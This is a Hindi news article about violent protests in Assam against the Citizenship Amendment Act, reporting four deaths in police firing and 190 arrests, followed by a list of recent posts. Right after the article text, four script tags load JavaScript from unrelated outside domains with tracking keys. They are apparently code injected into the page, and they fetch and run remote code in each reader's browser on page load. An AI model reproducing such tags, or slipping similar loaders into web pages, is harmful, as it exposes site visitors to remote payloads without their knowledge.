Categories: इंडिया

असमः CAA को लेकर हो रहे हिंसक प्रदर्शन में 4 की मौत, 190 गिरफ्तार

<p>नागरिकता संशोधन एक्ट के खिलाफ देश के अलग-अलग हिस्सों में विरोध प्रदर्शन जारी है। इसी प्रदर्शन के मद्देनज़र असम पुलिस ने अभी तक 190 प्रदर्शनकारियों को गिरफ्तार किया है। इनमें एक कांग्रेस कार्यकर्ता भी शामिल है, इन सभी पर हिंसा की साजिश करने का आरोप है। जबकि, पुलिस फायरिंग में चार लोगों की मौत भी हुई है।</p>

<p>असम पुलिस के डीजीपी भास्कर ज्योति महंत का कहना है कि पुलिस के एक्शन में चार लोगों की मौत हो गई है। ऐसे हालात बन गए थे कि पुलिस को फायरिंग करनी ही पड़ी, हालांकि अब हालात काफी हद तक सुधर गए हैं। डीजीपी बोले कि अभी तक 136 केस रजिस्टर हुए हैं, 190 लोगों को गिरफ्तार किया गया है।</p>

<p>बता दें कि नागरिकता संशोधन एक्ट के खिलाफ पूर्वोत्तर के कई हिस्सों में विरोध प्रदर्शन हो रहा है। इनमें अधिकतर विरोध असम में हुआ है। पूरे राज्य में अभी तक पुलिस ने 3000 से अधिक लोगों को हिरासत में लिया है। पुलिस का दावा है कि हिंसा के पीछे राजनीतिक साजिश है, इसके अलावा अभी तक पुलिस फायरिंग में चार लोगों की मौत हुई है। जिन युवा छात्रों को प्रदर्शन में हिस्सा लेने के लिए हिरासत में लिया गया था, उन्हें काउंसलिंग के बाद छोड़ दिया गया है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1576560095044″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Video: भारत ने कम दूरी की वायु रक्षा मिसाइल प्रणाली का किया सफल परीक्षण

  नई दिल्ली: भारत ने राजस्थान के पोखरण फायरिंग रेंज में बहुत ही कम दूरी…

5 hours ago

Himachal: जेपी नड्डा बोले- आजकल राहुल गांधी अर्बन नक्सल, देश को तोड़ने वालों की भाषा बोल रहे

  नाहन: भाजपा के राष्ट्रीय अध्यक्ष जेपी नड्डा ने हिमाचल प्रदेश के नाहन में आयोजित…

6 hours ago

राहुल गांधी शिवाजी महाराज की प्रतिमा का अनावरण करते हुए भाजपा पर हमलावर, बोले- संविधान बर्बाद कर शीश झुकाने का कोई मतलब नहीं

Kohlapur/Agencies: कांग्रेस नेता राहुल गांधी ने शनिवार को कोल्हापुर में मराठा साम्राज्य के संस्थापक छत्रपति…

7 hours ago

Mandi News: अवैध निर्माण पर शिकंजा, 225 नोटिसाें में 10 की सुनवाई

  illegal construction cases : मंडी नगर निगम द्वारा अवैध निर्माण के खिलाफ जारी किए…

8 hours ago

Himachal: हरियाणा में भाजपा लगाएगी हैट्रिक: अनुराग

Hamirpur: सांसद अनुराग सिंह ठाकुर ने नादौन के गलोड में भाजपा कार्यकर्ता सम्मेलन के दौरान…

8 hours ago